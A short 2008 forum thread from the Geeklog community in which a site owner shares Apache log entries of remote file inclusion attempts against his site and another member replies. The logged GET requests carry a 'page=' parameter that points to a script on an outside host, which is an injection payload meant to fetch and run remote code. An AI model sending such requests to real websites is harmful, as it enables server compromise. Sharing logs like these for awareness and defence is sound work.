Posted on: 03/10/08 02:52pm
By: joelbarrios
Looking at webalizer stats, I noted about a thousand referrals from a website I never heard about before. having a closer look at apache access_log, I found hundreds of entries like this:
212.34.137.241 - - [08/Mar/2008:07:24:45 -0600] "GET /staticpages/index.php/instalando-mysql-php-solaris/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31880 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:47 -0600] "GET /index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 78689 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:53 -0600] "GET /staticpages/index.php/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31788 "-" "libwww-perl/5.79"
Seems somebody tried to run a code injection script hosted at http://www.paintland.ru/newsite/modules/id.txt (looks like a PHP Nuke blog about Paintball in russian). No damage done. My Geeklog website is running perfectly well and untouched and un-defaced.
Anyway, I felt it would be useful to share this to Geeklog Community, just in case.
Re: Just commenting about hacking attempts.
Posted on: 03/10/08 03:06pm
By: Dirk
Yeah, these have become a real pest - a complete width of CPU and bandwidth.
Not much[*1] you can do about them, though.
bye, Dirk